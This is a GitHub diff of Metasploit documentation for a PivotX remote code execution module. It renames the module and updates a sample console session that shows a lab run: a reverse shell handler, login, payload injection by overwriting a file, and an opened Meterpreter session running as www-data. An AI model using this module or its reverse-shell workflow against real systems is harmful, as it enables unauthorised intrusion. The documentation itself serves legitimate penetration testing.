File tree Expand file tree Collapse file tree 1 file changed +12
-3
lines changed
documentation/modules/exploit/linux/http Expand file tree Collapse file tree 1 file changed +12
-3
lines changed Original file line number Diff line number Diff line change @@ -23,7 +23,6 @@ Install steps:
23
23
24
24
## Options
25
25
26
-
27
26
### USERNAME
28
27
29
28
PivotX username.
@@ -35,14 +34,24 @@ PivotX password.
35
34
## Scenarios
36
35
37
36
```
38
- msf exploit(linux/http/pivotx_rce ) > run verbose=true
37
+ msf exploit(linux/http/pivotx_index_php_overwrite ) > run verbose=true
39
38
[*] Started reverse TCP handler on 192.168.168.128:4444
39
+ [*] Running automatic check ("set AutoCheck false" to disable)
40
+ [+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
41
+ [*] Logging in PivotX
42
+ [*] Modifying file and injecting payload
43
+ [*] Triggering payload
40
44
[*] Sending stage (40004 bytes) to 192.168.168.146
41
- [*] Meterpreter session 4 opened (192.168.168.128:4444 -> 192.168.168.146:40562) at 2025-07-18 14:20:03 +0200
45
+ [*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200
46
+
47
+ [*] Restoring original content
42
48
49
+ meterpreter >
43
50
meterpreter > sysinfo
44
51
Computer : ubuntu
45
52
OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
46
53
Meterpreter : php/linux
54
+ meterpreter > getuid
55
+ Server username: www-data
47
56
48
57
```
You can’t perform that action at this time.
0 commit comments